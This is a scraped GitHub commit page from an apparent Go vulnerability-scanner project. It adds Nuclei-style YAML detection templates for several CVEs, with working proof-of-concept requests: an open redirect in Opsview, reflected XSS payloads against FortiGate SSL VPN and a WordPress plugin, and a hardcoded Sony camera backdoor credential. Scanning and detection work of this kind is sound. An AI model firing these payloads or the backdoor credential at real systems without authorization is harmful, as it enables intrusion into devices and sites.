-
Notifications
You must be signed in to change notification settings - Fork 670
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
2、Refactor the engine model 3、add async do cmd 4、Optimize masscan code 2022-09-24
- Loading branch information
Showing
94 changed files
with
1,507 additions
and
238 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -55,7 +55,7 @@ func init() { | |
asz404Url = aT1 // 容错 | ||
} | ||
} | ||
util.GetDb(&ErrPage{}) | ||
util.InitDb(&ErrPage{}) | ||
}) | ||
} | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
id: CVE-2016-10368 | ||
|
||
info: | ||
name: Opsview Monitor Pro 4.5.x - Open Redirect | ||
author: 0x_Akoko | ||
severity: medium | ||
description: | | ||
Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841 prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI. | ||
reference: | ||
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368 | ||
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2016-10368 | ||
cwe-id: CWE-601 | ||
tags: cve,cve2016,redirect,opsview,authenticated | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /login HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
login_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
part: header | ||
regex: | ||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' | ||
|
||
- type: status | ||
status: | ||
- 302 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,44 @@ | ||
id: CVE-2016-7834 | ||
|
||
info: | ||
name: Sony IPELA Engine IP Camera - Harcoded Account | ||
author: af001 | ||
severity: high | ||
description: | | ||
Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. | ||
reference: | ||
- https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/ | ||
- https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ | ||
- https://jvn.jp/en/vu/JVNVU96435227/index.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-7834 | ||
remediation: | | ||
Upgrade to the latest version of the firmware provided by Sony. | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 8.8 | ||
cve-id: CVE-2016-7834 | ||
cwe-id: CWE-200 | ||
tags: sony,backdoor,unauth,telnet,iot,camera | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/command/prima-factory.cgi" | ||
|
||
headers: | ||
Authorization: Bearer cHJpbWFuYTpwcmltYW5h | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: header | ||
words: | ||
- 'gen5th' | ||
- 'gen6th' | ||
condition: or | ||
|
||
- type: status | ||
status: | ||
- 204 | ||
|
||
# Enhanced by cs 09/23/2022 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
id: CVE-2017-14186 | ||
|
||
info: | ||
name: FortiGate SSL VPN Web Portal - Cross Site Scripting | ||
author: johnk3r | ||
severity: medium | ||
description: | | ||
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack. | ||
reference: | ||
- https://www.fortiguard.com/psirt/FG-IR-17-242 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186 | ||
classification: | ||
cve-id: CVE-2017-14186 | ||
metadata: | ||
verified: true | ||
shodan-query: port:10443 http.favicon.hash:945408572 | ||
tags: cve,cve2017,fortigate,xss,fortinet | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"' | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- "text/html" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
id: CVE-2021-25104 | ||
|
||
info: | ||
name: Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting | ||
author: Akincibor | ||
severity: medium | ||
description: The plugin does not escape generated links which are then used when the OceanWP theme is active, leading to a Reflected Cross-Site Scripting issue. | ||
reference: | ||
- https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 | ||
- https://wordpress.org/plugins/ocean-extra/ | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25104 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25104 | ||
remediation: Fixed in version 1.9.5 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2021-25104 | ||
cwe-id: CWE-79 | ||
metadata: | ||
verified: "true" | ||
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /wp-login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{RootURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
- | | ||
GET /wp-admin/?step=demo&page=owp_setup&a"><script>alert(/XSS/)</script> HTTP/1.1 | ||
Host: {{Hostname}} | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- 'OceanWP' | ||
- '><script>alert(/XSS/)</script>' | ||
condition: and | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
Oops, something went wrong.